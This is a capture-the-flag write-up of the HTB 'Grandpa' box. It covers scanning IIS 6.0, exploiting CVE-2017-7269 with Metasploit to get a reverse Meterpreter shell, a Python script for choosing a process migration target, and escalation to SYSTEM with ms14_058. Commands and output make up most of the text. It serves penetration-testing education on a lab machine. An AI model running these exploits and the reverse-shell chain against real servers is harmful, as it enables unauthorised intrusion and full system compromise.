Preface
This post is a writeup of Grandpa. 📝
We'll be taking on a grandpa whose hair is looking a little thin.
Machine Info
Name: Grandpa
IP Address: 10.10.10.14
OS: Windows 🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap 10.10.10.14 -Pn -v -A --script=vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 20:05 JST
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:05
NSE Timing: About 44.44% done; ETC: 20:06 (0:00:40 remaining)
Completed NSE at 20:05, 34.32s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.12s elapsed
Initiating SYN Stealth Scan at 20:05
Scanning 10.10.10.14 [1000 ports]
Discovered open port 80/tcp on 10.10.10.14
Completed SYN Stealth Scan at 20:06, 19.78s elapsed (1000 total ports)
Initiating Service scan at 20:06
Scanning 1 service on 10.10.10.14
Completed Service scan at 20:06, 6.76s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.14
Retrying OS detection (try #2) against 10.10.10.14
Initiating Traceroute at 20:06
Completed Traceroute at 20:06, 0.28s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:06
Completed Parallel DNS resolution of 2 hosts. at 20:06, 0.04s elapsed
NSE: Script scanning 10.10.10.14.
Initiating NSE at 20:06
Completed NSE at 20:19, 793.54s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 4.99s elapsed
Nmap scan report for 10.10.10.14
Host is up (0.26s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
| vulners:
| cpe:/a:microsoft:internet_information_services:6.0:
| PACKETSTORM:93313 6.0 https://vulners.com/packetstorm/PACKETSTORM:93313 *EXPLOIT*
| CVE-2009-4445 6.0 https://vulners.com/cve/CVE-2009-4445
|_ CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/6.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003 (92%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (92%), Microsoft Windows Server 2003 SP1 (91%), Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (88%), Microsoft Windows 2000 SP4 (88%), Microsoft Windows XP SP2 or SP3 (88%), Microsoft Windows XP SP3 (88%), Microsoft Windows 2000 SP1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 261.36 ms 10.10.14.1
2 261.52 ms 10.10.10.14
NSE: Script Post-scanning.
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 868.75 seconds
Raw packets sent: 2082 (95.124KB) | Rcvd: 46 (2.792KB)
Only port 80 is open. Nmap also tells us three things worth remembering: the server identifies as Microsoft-IIS/6.0, WebDAV is enabled (http-iis-webdav-vuln), and FrontPage Server Extensions are installed (the /_vti_bin/ paths and the anonymous-login finding).
Site - http://10.10.10.14
The IIS default start page comes up.
Enumeration
Let's check whether anything was missed.
dirsearch
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# dirsearch -u http://10.10.10.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/Desktop/work/reports/http_10.10.10.14/_24-01-04_18-26-42.txt
Target: http://10.10.10.14/
[18:26:42] Starting:
[18:26:52] 403 - 32B - /%2e%2e//google.com
[18:26:53] 403 - 32B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[18:26:53] 404 - 1KB - /.asmx
[18:26:53] 404 - 1KB - /.axd
[18:26:53] 404 - 1KB - /.ashx
[18:27:13] 403 - 32B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:27:15] 403 - 1KB - /_private
[18:27:15] 403 - 1KB - /_private/
[18:27:15] 403 - 218B - /_vti_bin/
[18:27:15] 301 - 155B - /_vti_bin -> http://10.10.10.14/%5Fvti%5Fbin/
[18:27:15] 200 - 195B - /_vti_bin/_vti_adm/admin.dll
[18:27:15] 200 - 195B - /_vti_bin/_vti_aut/author.dll
[18:27:15] 403 - 1KB - /_vti_cnf
[18:27:15] 404 - 103B - /_vti_cnf/
[18:27:15] 500 - 112B - /_vti_pvt/administrator.pwd
[18:27:15] 500 - 112B - /_vti_pvt/
[18:27:15] 403 - 1KB - /_vti_pvt
[18:27:15] 500 - 112B - /_vti_pvt/administrators.pwd
[18:27:15] 200 - 2KB - /_vti_inf.html
[18:27:15] 500 - 88B - /_vti_pvt/users.pwd
[18:27:15] 500 - 88B - /_vti_pvt/service.pwd
[18:27:15] 403 - 1KB - /_vti_log
[18:27:15] 403 - 1KB - /_vti_log/
[18:27:15] 500 - 112B - /_vti_pvt/authors.pwd
[18:27:15] 200 - 96B - /_vti_bin/shtml.dll
[18:27:15] 500 - 88B - /_vti_pvt/service.pwt
[18:27:15] 500 - 88B - /_vti_pvt/shtml.exe
[18:27:15] 500 - 88B - /_vti_pvt/users.pwt
[18:27:15] 200 - 96B - /_vti_bin/shtml.exe?_vti_rpc
[18:27:15] 403 - 1KB - /_vti_txt/
[18:27:15] 403 - 1KB - /_vti_txt
[18:27:46] 403 - 218B - /aspnet_client
[18:27:46] 403 - 218B - /aspnet_client/
[18:27:55] 403 - 32B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[18:28:11] 404 - 1KB - /elmah.axd
[18:28:23] 301 - 149B - /images -> http://10.10.10.14/images/
[18:28:23] 403 - 218B - /images/
[18:28:56] 200 - 2KB - /postinfo.html
[18:29:05] 404 - 1KB - /service.asmx
[18:29:17] 404 - 1KB - /Telerik.Web.UI.WebResource.axd?type=rau
[18:29:21] 403 - 2KB - /Trace.axd
[18:29:22] 404 - 1KB - /umbraco/webservices/codeEditorSave.asmx
[18:29:31] 404 - 1KB - /WebResource.axd?d=LER8t9aS
Task Completed
Whoa, it enumerated a lot. Let's start by checking the 200 - Success entries.
/_vti_bin/_vti_adm/admin.dll
What is this? Hard to tell; some kind of log? Accessing /_vti_bin/_vti_aut/author.dll gives the same thing. These are the FrontPage Server Extensions RPC endpoints that http-enum already flagged (admin.dll for administration, author.dll for authoring); a plain GET to them only returns a short response (195 bytes in the dirsearch output), so they don't look relevant here.
No page stood out, so let's try a different approach. Looking back at the Nmap output and at http://10.10.10.14, the server is Microsoft-IIS/6.0.
Identification of Vulnerability
Let's search for "Microsoft-IIS 6.0 vuln".
CVE-2017-7269
This is a stack buffer overflow in the WebDAV service of IIS 6.0 on Windows Server 2003 R2, in the ScStoragePathFromUrl function of the server-side WebDAV handler (httpext.dll). It is not in the WebDAV Mini-Redirector, which is the Windows client-side WebDAV component and a different attack surface altogether.
The bug is reached with a crafted HTTP request: a PROPFIND whose header begins with "If: <http://" and carries an overlong URL. The server copies that value into a fixed-size stack buffer without checking its length, so the bytes past the end of the buffer overwrite adjacent stack memory.
Overwriting the saved return address and other control data lets the attacker redirect execution into a payload. That code runs inside the IIS worker process (w3wp.exe), i.e. with the application pool identity rather than SYSTEM. One practical wrinkle: the exploit needs the length of the web root's physical path on disk, which is why the Metasploit module brute-forces it (MINPATHLENGTH / MAXPATHLENGTH in its options).
Exploit the Vulnerability
metasploit
└─$ msfconsole
Metasploit tip: View all productivity tips with the tips command
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.3.43-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2017-7269
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Searching by CVE turns up a promising module. Let's use it.
Check which settings are required with show options and configure them.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.236.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

View the full module info with the info, or info -d command.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.4
lhost => 10.10.14.4
Run it.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.14:1030) at 2024-01-04 20:28:05 +0900
meterpreter >
Looks like it worked.
On this box the session starts as the IIS application pool identity (NT AUTHORITY\NETWORK SERVICE, as the ps output later shows), which cannot read the flags; once we reach SYSTEM, user.txt and root.txt become readable at the same time. So let's go straight to the privilege escalation phase.
Privilege Escalation
Background the session, then use Multi Recon Local Exploit Suggester to look for local vulnerabilities.
Background session 1? [y/N] y
[-] Unknown command: y
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the
available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
Configuration done.
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 188 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.14 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
7 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
8 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
9 exploit/windows/local/always_install_elevated No The target is not exploitable.
10 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
11 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception.
12 exploit/windows/local/bthpan No The target is not exploitable.
13 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
14 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
15 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
16 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
17 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
18 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
19 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
20 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
21 exploit/windows/local/ikeext_service No The check raised an exception.
22 exploit/windows/local/ipass_launch_app No The check raised an exception.
23 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
24 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
25 exploit/windows/local/mqac_write No The target is not exploitable.
26 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
27 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
28 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
29 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
30 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
31 exploit/windows/local/ms16_075_reflection No The check raised an exception.
32 exploit/windows/local/ms16_075_reflection_juicy No The check raised an exception.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
The top six look promising. Let's try them.
But even after trying all six, you probably got a failure like this:
[*] Started reverse TCP handler on 10.10.14.4:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
Process Migration
The error above comes from stdapi_sys_config_getsid: Meterpreter cannot even read the SID of the process it is living in. Our session landed in rundll32.exe (PID 3376), a child of the IIS worker w3wp.exe; in the ps output below it is the one x86 process whose User column is empty, meaning its token cannot be queried, which is exactly what the local exploits trip over when they call getsid.
It is not an architecture mismatch: the target is 32-bit Windows Server 2003 and every process in the list is x86. (A 32-bit Meterpreter trying to run a 64-bit payload on a 64-bit host is the classic reason to migrate, but it does not apply here.)
The fix is to migrate into a process with a normal token. w3wp.exe (PID 2604, NT AUTHORITY\NETWORK SERVICE) is a good choice: it is the long-lived IIS worker that owns our rundll32.exe and runs as a service account. Migrating can also land you in a more stable process, or one with higher privileges. So let's migrate and try again.
[*] Starting interaction with 1...
meterpreter > ps
Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 656   1072  cidaemon.exe
 668   392   svchost.exe
 736   392   svchost.exe
 768   392   svchost.exe
 788   392   svchost.exe
 924   392   spoolsv.exe
 952   392   msdtc.exe
 1072  392   cisvc.exe
 1112  392   svchost.exe
 1168  392   inetinfo.exe
 1204  392   svchost.exe
 1312  392   VGAuthService.exe
 1384  392   vmtoolsd.exe
 1488  392   svchost.exe
 1592  392   svchost.exe
 1664  1072  cidaemon.exe
 1772  392   dllhost.exe
 1936  392   alg.exe
 1964  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2092  1072  cidaemon.exe
 2256  584   wmiprvse.exe
 2604  1488  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2740  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3060  344   logon.scr
 3376  2604  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
Process migration is done with the migrate command.
meterpreter > migrate 2604
[*] Migrating from 3376 to 2604...
[*] Migration completed successfully.
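Choosing the migration target by eye works on a list this short; on a busier host it helps to apply the same rules mechanically. The Python script below is an added example, not part of the original writeup or of Metasploit: it parses a process list in the layout of Meterpreter's ps output and ranks candidates that share the payload's architecture and have a readable token, preferring long-lived service processes. PS_SAMPLE is a constructed subset in that layout, and the scoring table is this example's own heuristic.

```python
"""Choose a Meterpreter migration target from `ps` output.
Added example, not part of the original writeup or of Metasploit. PS_SAMPLE
is constructed in the layout of Meterpreter's process list; the scoring
rules are this example's own heuristics."""
import re

PS_SAMPLE = """\
 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 1168  392   inetinfo.exe
 1964  584   wmiprvse.exe      x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe
 2604  1488  w3wp.exe          x86   0        NT AUTHORITY\\NETWORK SERVICE  c:\\windows\\system32\\inetsrv\\w3wp.exe
 2740  584   davcdata.exe      x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\inetsrv\\davcdata.exe
 3376  2604  rundll32.exe      x86   0                                      C:\\WINDOWS\\system32\\rundll32.exe
"""

# One ps row. Arch/Session/User/Path are absent when Meterpreter could not open
# the process at all; User alone is absent when the process opened but its
# token could not be read. Paths containing spaces are not handled here.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)\s+(?P<user>.*?)\s*(?P<path>[A-Za-z]:\\\S*))?"
    r"\s*$"
)

# Example's own preference order: long-lived service processes first.
STABLE = {"w3wp.exe": 3, "davcdata.exe": 2, "wmiprvse.exe": 1}


def parse_ps(text):
    """Turn ps text into a list of process dicts; header/separator rows are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        procs.append({
            "pid": int(m.group("pid")),
            "ppid": int(m.group("ppid")),
            "name": m.group("name"),
            "arch": m.group("arch"),
            "user": m.group("user") or "",
            "path": m.group("path") or "",
        })
    return procs


def migration_candidates(procs, current_pid, arch="x86"):
    """Rank processes to migrate into, best first, as (score, pid, name, user)."""
    ranked = []
    for p in procs:
        if p["pid"] == current_pid or p["arch"] != arch:
            continue          # keep the payload's architecture
        if not p["user"]:
            continue          # unreadable token: exactly the state we are leaving
        score = STABLE.get(p["name"].lower(), 0)
        if p["user"].upper() == "NT AUTHORITY\\SYSTEM":
            score += 10       # already SYSTEM: migrating there is the escalation
        ranked.append((score, p["pid"], p["name"], p["user"]))
    ranked.sort(key=lambda r: (-r[0], r[1]))
    return ranked


def best_target(ps_text, current_pid, arch="x86"):
    """PID to pass to `migrate`, or None when nothing suitable is visible."""
    ranked = migration_candidates(parse_ps(ps_text), current_pid, arch)
    return ranked[0][1] if ranked else None


if __name__ == "__main__":
    for score, pid, name, user in migration_candidates(parse_ps(PS_SAMPLE), 3376):
        print(f"{score:2d}  {pid:5d}  {name:14s}  {user}")
    print("migrate", best_target(PS_SAMPLE, 3376))
```

On the sample the ranking is w3wp.exe (2604), then davcdata.exe (2740), then wmiprvse.exe (1964); rundll32.exe is excluded because its token is unreadable, and the processes Meterpreter could not open at all carry no architecture and are never offered.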
Now let's run the exploit again from this process.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.12:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching netsh to host the DLL...
[+] Process 1260 launched.
[*] Reflectively injecting the DLL into 1260...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.12:4444 -> 10.10.10.14:1031) at 2024-01-08 17:18:09 +0900
meterpreter >
Yes! It worked. The nt authority\system output below confirms the privilege escalation succeeded.
meterpreter > shell
Process 2344 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
Under Documents and Settings we find Administrator and Harry.
c:\windows\system32\inetsrv>cd c:\
cd c:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
09/16/2021 11:52 AM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 1,317,928,960 bytes free
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 1,317,994,496 bytes free
Administrator
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Administrator
04/12/2017 04:12 PM <DIR> .
04/12/2017 04:12 PM <DIR> ..
04/12/2017 04:28 PM <DIR> Desktop
04/12/2017 04:12 PM <DIR> Favorites
04/12/2017 04:12 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 1,317,842,944 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 1,317,838,848 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32-character root flag
Harry
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Harry
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM <DIR> Desktop
04/12/2017 04:32 PM <DIR> Favorites
04/12/2017 04:32 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 1,317,834,752 bytes free
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 1,317,834,752 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32-character user flag
Got both.
Afterword
This box was another good refresher on using Metasploit, and a good machine for learning process migration. By the way, the box Granny can be compromised with the same technique.
Go and take on grandma too, as a review!